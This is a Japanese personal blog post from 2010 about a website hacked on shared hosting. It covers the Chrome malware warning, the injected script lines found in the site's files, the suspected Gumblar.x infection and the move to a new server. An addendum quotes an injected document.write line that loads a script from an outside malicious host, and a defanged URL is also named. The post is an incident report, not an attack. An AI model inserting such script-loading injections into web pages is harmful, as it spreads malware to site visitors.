でろぐのロゴ 豚さんブーブー

サーバー移転をしました。

2010年2月9日 (火)

こにくたらしいウィルスのせいでサーバー移転をするハメになりました。
どんな事が起こったのかをまとめてみました。
同じ境遇に陥ったら参考にしてください。

まず、予兆とか一切なくいきなり下の画面のようにサイトに訪れると警告画面になります。

警告画面。いきなり出てくるとけっこうびびる。

ちなみにブラウザがGoogleChromeだけしかでませんので注意。
一応手元にあるIE8、Firefox3.6、Opera10、Safari4.0で確認しましたが上のような画面はでません。
Googleに感謝!さすがGoogleChrome。メインブラウザGoogleChromeにしてよかったw
で、Googleさんの診断は以下のような感じ。

Googleによる診断

どうもページの中に疑わしいURLを読み込んでまっせってな感じのことが書いてあります。
おかしいなと思い勇気を持って確認してみると・・・・


何だこの1行?こんなソース書いた覚えがないが・・・

なんてこったい!HTMLのソースに変な1行が追加されてるよ!外人なら「OH MY GOD!」もしくは「OH!SHIT!」ト叫ぶ場面です。
冗談はさておき完全にサーバー側に置いてあるHTMLが改竄されちゃってます。

ttp://paragonengg.com

ってう疑わしいサイトを読み込むJSが書き込まれてます。
しかもそのサーバー内のHTML、PHP、CGIとか画像以外の全てに!
(上記URLはアクセス出来ないように先頭のhを抜いてます。Googleが怪しいていうサイトなので絶対にアクセスしないでください。アクセスしても僕は責任取りません。)

というわけで完全にこのままにしておく訳にはいかなくなったのですが、まずはなぜこうなったのかの原因を突き止めないと怖いのでまずはローカルがウィルスに感染していないかをチェック。
信頼するESET SMRT SECURITYを使い全ドライブをスキャンします。
全てのドライブをスキャンしとところ検出はなしでした。
ここはESETを信用し、ローカルに原因がないという事にすると原因はサーバー側かという事になりますよね。

借りてるサーバーは安い共用サーバーなので他のアカウントのやつからサーバーにウィルスが侵入したんじゃね?と思いサーバーにメール。
サーバー会社(どこかはいいませんがヒントは月1000円以内のところですw)からは半日ほどすると回答が。
しかし回答は、
・運用スクリプト、CGIのセキュリティホールがある
・共有環境からパスワードが漏れる形でアクセスしてしまっている
・ウィルスによりメール等のPC上のファイルが外部に送信されてしまっている
というのが疑わしいですねという事。

要は「自己責任なんだから自分で何とかしてね」という事です。
というわけでローカルには原因もないのでサーバーを移転することにしました。
さようなら安いサーバー。今までありがとう。

移転先はFTPが暗号化されるFTPSを使えるそこそこ安いサーバーですw
これで仮にこのPCが原因だったとしてもサイトは大丈夫という事になると思うのでしばらく様子見です。

ちなみに最近話題のガンブラーはJSファイルに書き込みがあるパターンが多いというので、今回のパターンは少し違うのでおそらくガンブラーではないかと思います。
また、ガンブラーにこのPCがやられちゃってる場合はこのサイトだけでなく僕のサイト全部にこの症状が出てしまうはずなので9割型こっちの問題ではないはずです。もしちがってたらすいません。

追記:JSファイルにもdocument.write(‘<script src=http://bsk-spedition.de/いめーじす/index-2.php ></script>’);みたいに書き込まれてるのも発見!対象はhtml、php、jsということでGumblar.xでほぼ確定。
となるとESETが未発見ウィルスなので検出しなかっただけという可能性もできてました・・・・。
確定したらOSの再インストールをしないと・・・・・。
ああめんどくさいなあああああああああああああ

シェアする